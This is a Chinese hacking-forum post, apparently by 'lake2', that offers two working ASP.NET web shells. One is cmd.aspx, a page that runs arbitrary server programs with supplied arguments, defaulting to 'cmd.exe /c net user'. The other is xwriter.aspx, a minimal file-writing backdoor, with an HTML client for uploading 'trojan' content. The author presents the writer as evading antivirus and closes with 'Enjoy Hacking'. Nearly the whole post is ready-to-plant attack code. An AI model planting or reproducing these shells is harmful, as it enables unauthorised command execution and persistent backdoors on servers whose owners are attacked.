两个有用的ASP.Net小程序

一、cmd.aspx

在邪恶八进制论坛（PS：有谁知道为什么最近几天这论坛打不开啊）有朋友提出WebAdmin执行命令不能带参数的问题，偶找了个BT主机来试试，果然有问题，就把以前那个cmd.aspx改了改，就请凑合着用先。WebAdmin 2.X的下个版本将修复这个问题J

把一下代码复制保存为一.aspx文件即可：

<%@ Page Language="VB" Debug="true" %>

<%@ import Namespace="system.IO" %>

<%@ import Namespace="System.Diagnostics" %>

<script runat="server">

Sub RunCmd(Src As Object, E As EventArgs)

Dim myProcess As New Process()

Dim myProcessStartInfo As New ProcessStartInfo(xpath.Text)

myProcessStartInfo.UseShellExecute = False

myProcessStartInfo.RedirectStandardOutput = true

myProcess.StartInfo = myProcessStartInfo

myProcessStartInfo.Arguments=xCmd.text

myProcess.Start()

Dim myStreamReader As StreamReader = myProcess.StandardOutput

Dim myString As String = myStreamReader.Readtoend()

myProcess.Close()

mystring=replace(mystring,"<","&lt;")

mystring=replace(mystring,">","&gt;")

result.text= vbcrlf & "<pre>" & mystring & "</pre>"

End Sub

</script>

<html>

<head>

<title>ASP.NET Shell for WebAdmin2.X Final</title>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />

</head>

<body>

<form runat="server">

<asp:Label id="L_p" style="COLOR: #0000ff" runat="server" width="80px">Program</asp:Label>

<asp:TextBox id="xpath" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>

<

br />

<asp:Label id="L_a" style="COLOR: #0000ff" runat="server" width="80px">Arguments</asp:Label>

<asp:TextBox id="xcmd" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; BORDER-BOTTOM: #084b8e 1px solid" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>

<

br />

<asp:Button id="Button" style="BORDER-RIGHT: #084b8e 1px solid; BORDER-TOP: #084b8e 1px solid; BORDER-LEFT: #084b8e 1px solid; COLOR: #ffffff; BORDER-BOTTOM: #084b8e 1px solid; BACKGROUND-COLOR: #719bc5" onclick="runcmd" runat="server" Width="100px" Text="Run"></asp:Button>

<p>

<asp:Label id="result" style="COLOR: #0000ff" runat="server"></asp:Label>

</p>

</form>

</body>

</html>

二、xwriter.aspx

记得有个ASP下的小马就是利用FSO把提交的文本信息保存为一个文件，虽然体积比eval大些但是代码完全合法，杀毒软件也不会找茬的。呵呵，以下代码就是在ASP.NET实现这功能（自己拿去改改还可以插入ASPX文件哦）：

<%@ Page Language="VB" %>

<%@ import Namespace="System.IO" %>

<script runat="server">

Sub Page_load(sender As Object, E As EventArgs)

dim mywrite as new streamwriter(request.form("path"), true, encoding.default)

mywrite.write(request.form("content"))

mywrite.close

response.write("Done!")

End Sub

</script>

以下是客户端，复制下来保存为htm文件：

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"

"http://www.w3.org/TR/html4/loose.dtd">

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=gb2312">

<title>XWriter.NET by lake2</title>

</head>

<body>

<form name="form1" method="post" onSubmit="TwoSubmit(this);">

<div align="center">URL:

<input name="url" type="text" value="http://www.xxx.com/a.aspx" size="60">

<

br>

Path:

<input name="path" type="text" id="path" value="e:\myweb\myown\a.txt" size="60">

<

br>

<textarea name=content cols=120 rows=10 id="content" width=45>填入生成木马的内容，最好是全英文</textarea>

<

BR>

<center>

<

br>

<input type=submit value=提交>

<

br>

Enjoy Hacking !!!!!! </div>

</body></html>

<script language="javascript">

function TwoSubmit(form1){

var url = document.form1.url.value;

form1.action=url;

form1.submit();

}

</script>

• ·VC数字图像处理编程讲座之八（1）
• ·wap(Wireless Applicatio
• ·赛车游戏(一)通过蓝牙实现两个手机交互
• ·[翻译]设计.Net Compact Fram
• ·J2ME中索引值(index)使用总结
• ·SAP打补丁时需要注意的地方。
• ·国家农业标准化示范区管理系统验收通过
• ·[翻译]设计.Net Compact Fram
• ·lwIP――TCP/IP协议栈的一种实现（1）
• ·Linux 中的防火墙